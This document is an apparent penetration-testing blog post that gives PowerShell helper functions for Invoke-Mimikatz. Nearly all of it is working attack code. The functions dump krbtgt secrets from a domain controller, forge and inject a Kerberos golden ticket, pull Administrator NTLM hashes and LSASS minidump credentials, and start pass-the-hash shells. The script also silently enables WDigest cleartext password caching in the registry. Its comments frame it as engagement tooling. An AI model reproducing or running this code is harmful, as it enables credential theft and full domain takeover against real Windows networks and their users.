One of the main security issues with Windows is pass-the-hash. I added some functions to the Mimikatz PowerShell script (Invoke-Mimikatz), which can be found here.
These functions make using mimikatz easier. Append them to the end of the Invoke-Mimikatz script and launch the script; the functions are then loaded in memory and the available functions are listed. Note that launching the script also sets the WDigest UseLogonCredential registry value to 1 (see the end of the listing) so that cleartext passwords are kept in LSASS — a host-wide downgrade that should be reverted when you are done.
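Function Global:invoke-mimiDom {
    # Build and inject a Kerberos "golden ticket" from the krbtgt material that
    # invoke-MimiExportDom wrote to $ScriptPath\mimi_dom.log (lsadump::lsa /inject /name:krbtgt).
    # Reads:  $ScriptPath (assumed to be set by the host script — not defined here), mimi_dom.log
    # Writes: $global:mimidata, $global:aes, $global:domSid, $global:domain and the forged
    #         ticket forged.kirbi in the CURRENT directory (both /ticket: and kerberos::ptt
    #         use that relative path, so do not change directory between the two).
    # Note: mimi_dom.log holds the krbtgt AES key (the domain's master secret) and
    #       forged.kirbi is a disk artifact; both must be cleaned up after the engagement.
    $logFile = "$ScriptPath\mimi_dom.log"
    if (-not (Test-Path $logFile)) {
        Write-Host "there is no mimi_dom.log, please run first invoke-mimiexportdom on a domain controller" -ForegroundColor Red
        return
    }

    # Account name the forged ticket carries; /id:500 maps it to the built-in
    # Administrator RID regardless of this name.
    $MimiUser = "didi44"
    Write-Host $ScriptPath -ForegroundColor Green

    $global:mimidata = Get-Content $logFile
    # Reset before parsing so a value left over from an earlier call cannot leak in.
    $global:aes    = $null
    $global:domSid = $null
    $global:domain = $null
    foreach ($line in $mimidata) {
        # Keep only the FIRST aes256_hmac value. The dump can contain several of these
        # lines (e.g. an OldCredentials section after a krbtgt password change) and the
        # original "last match wins" loop would then pick a stale key.
        if ($null -eq $aes -and $line -match "aes256_hmac") {
            $global:aes = $($line.Split(":")[1]).Trim()
        }
        # "Domain : NAME / S-1-5-21-..." -> take the SID after the slash
        if ($line -match "Domain :") {
            $global:domSid = $($line.Split("/")[1]).Trim()
        }
        # "Default Salt : REALMkrbtgt" -> strip the account name to get the realm
        if ($line -match "Default Salt :") {
            $global:domain = $($($line.Split(":")[1]).Trim()).Replace("krbtgt", "")
        }
    }

    # Refuse to hand mimikatz a half-built command line.
    if (-not ($aes -and $domSid -and $domain)) {
        Write-Host "could not parse aes256 key, domain SID or domain name from $logFile" -ForegroundColor Red
        return
    }

    $FullCMD = "kerberos::golden /domain:" + $domain + " /sid:" + $domSid + " /aes256:" + $aes + " /user:" + $MimiUser + " /id:500 /groups:500,501,513,512,520,518,519 /ticket:forged.kirbi"
    # This echoes the krbtgt key to the console / transcript.
    Write-Host $FullCMD
    # Purge the current ticket cache first so the forged TGT is the one that gets used.
    Invoke-Mimikatz -Command "privilege::debug kerberos::purge `"$FullCMD`" `"kerberos::ptt forged.kirbi`" misc::cmd"
}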
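Function Global:invoke-mimiStd {
    # Run Invoke-Mimikatz with its default action, save the raw output to
    # $ScriptPath\mimi.log and pull the first "Administrator" entry's user / domain /
    # NTLM hash into $global:mimiUsername1, $global:mimiDom1, $global:mimiHash1
    # for Invoke-mimicmd.
    # Note: mimi.log contains every credential mimikatz could recover (hashes and,
    #       with WDigest enabled, cleartext passwords) — protect and delete it accordingly.
    $logFile = "$ScriptPath\mimi.log"
    $global:mimi_tmp = Invoke-Mimikatz
    $mimi_tmp | Out-File $logFile
    $global:mimi = Get-Content $logFile

    # Reset so a stale hash from a previous run is never reused by Invoke-mimicmd.
    $global:mimiUsername1 = $null
    $global:mimiDom1      = $null
    $global:mimiHash1     = $null

    for ($i = 0; $i -lt $mimi.Count; $i++) {
        if ($mimi[$i] -notmatch "\* Username : Administrator") { continue }
        # Same layout assumption as the original: the two lines after the username
        # line are "* Domain : ..." and "* NTLM : ...". Bounds-check so a truncated
        # log cannot throw on the index.
        if ($i + 2 -ge $mimi.Count) { break }
        $global:mimiUsername1 = $($mimi[$i].Split(":")[1]).Trim()
        $global:mimiDom1      = $($mimi[$i + 1].Split(":")[1]).Trim()
        $global:mimiHash1     = $($mimi[$i + 2].Split(":")[1]).Trim()
        break
    }

    if (-not $mimiUsername1) {
        Write-Host "no Administrator entry found in $logFile" -ForegroundColor Red
        return
    }
    Write-Host "$mimiUsername1 $mimiDom1 $mimiHash1"
}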
FUNCTION Global:invoke-MimiExportDom {
    # Dump the krbtgt account's secrets (lsadump::lsa /inject /name:krbtgt; intended to
    # be run on a domain controller) into $ScriptPath\mimi_dom.log for invoke-mimiDom.
    # Does nothing if the log already exists.
    # The file holds the krbtgt keys — effectively the domain's master secret — so keep
    # it only where it is protected and delete it once the engagement is over.
    $domLog = "$ScriptPath\mimi_dom.log"
    if (Test-Path $domLog) { return }
    $global:mimi_dom_tmp = Invoke-Mimikatz -Command "privilege::debug `"lsadump::lsa /inject /name:krbtgt`""
    $mimi_dom_tmp | Out-File $domLog
    $global:mimi_dom = Get-Content $domLog
}
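FUNCTION Global:Invoke-mimiDMP {
    # Run sekurlsa::logonpasswords against every LSASS minidump (*.dmp) in $ScriptPath.
    # The output of ALL dumps is collected into $global:mimi (newline-joined) and printed;
    # the original overwrote $global:mimi on every iteration and so only ever showed the
    # last dump's result.
    $dumps = Get-ChildItem "$ScriptPath\*.dmp"
    if (-not $dumps) {
        Write-Host "no *.dmp files found in $ScriptPath" -ForegroundColor Red
        return
    }

    $results = @()
    foreach ($dmp in $dumps) {
        Write-Host "analysing $dmp" -ForegroundColor Green
        # $dmp expands to the full path. As in the original it is not quoted, so a dump
        # path containing spaces may not be parsed correctly by mimikatz — verify if needed.
        $results += Invoke-Mimikatz -Command "privilege::debug `"sekurlsa::minidump $dmp`" sekurlsa::logonpasswords"
    }
    $global:mimi = $results -join "`n"
    Write-Host $mimi
}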
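FUNCTION Global:Invoke-mimicmd {
    # Pass-the-hash: start a cmd.exe whose logon session uses the NTLM hash that
    # invoke-mimiStd stored in $global:mimiUsername1 / $mimiDom1 / $mimiHash1
    # (sekurlsa::pth /user: /domain: /ntlm: /run:cmd).
    # The original guard "$mimiUsername1 -lt 1" compared a string with an integer and
    # only worked by accident; check all three inputs explicitly instead.
    if ([string]::IsNullOrEmpty($mimiUsername1) -or
        [string]::IsNullOrEmpty($mimiDom1) -or
        [string]::IsNullOrEmpty($mimiHash1)) {
        Write-Host "please run first invoke-mimiSTD" -ForegroundColor Red
        return
    }

    $command = "privilege::debug `"sekurlsa::pth /user:" + $mimiUsername1 + " /domain:" + $mimiDom1 + " /ntlm:" + $mimiHash1 + " /run:cmd`""
    # Echoing the command line also echoes the NTLM hash to the console / transcript.
    Write-Host "$command"
    $global:mimi = Invoke-Mimikatz -Command $command
}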
#sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND
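# Make WDigest keep logon credentials in LSASS so sekurlsa::logonpasswords can show
# cleartext passwords (on current Windows builds the default is not to keep them).
# WARNING: this is a host-wide, persistent security downgrade — every logon from now
# until the value is reverted leaves a cleartext password in LSASS memory — and a
# registry change that detection tooling is likely to flag. The previous value is kept
# in $global:wdigestPrevious so it can be restored at the end of the engagement.
$wdigestKey = "HKLM:\system\CurrentControlSet\Control\SecurityProviders\WDigest"
$global:wdigestPrevious = (Get-ItemProperty $wdigestKey).UseLogonCredential
if ($wdigestPrevious -ne 1) {
    # Set-ItemProperty creates the value if it is missing and overwrites it without the
    # interactive "overwrite (Yes/No)?" prompt that `reg add` without /f raises when the
    # value already exists (e.g. set to 0), which would hang a non-interactive session.
    Set-ItemProperty -Path $wdigestKey -Name UseLogonCredential -Type DWord -Value 1
    Write-Host "changed security provider – to see passeword in cleartext logoff and log on again" -ForegroundColor Yellow
}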
# Menu of the helper functions this file adds on top of the Invoke-Mimikatz script.
Write-Host "the following functions are available:"
$helperNames = @(
    "invoke-mimiStd",
    "invoke-mimiExportDom",
    "invoke-mimiDom",
    "invoke-mimiDmp",
    "invoke-mimiCMD"
)
foreach ($helper in $helperNames) {
    Write-Host $helper -ForegroundColor Green
}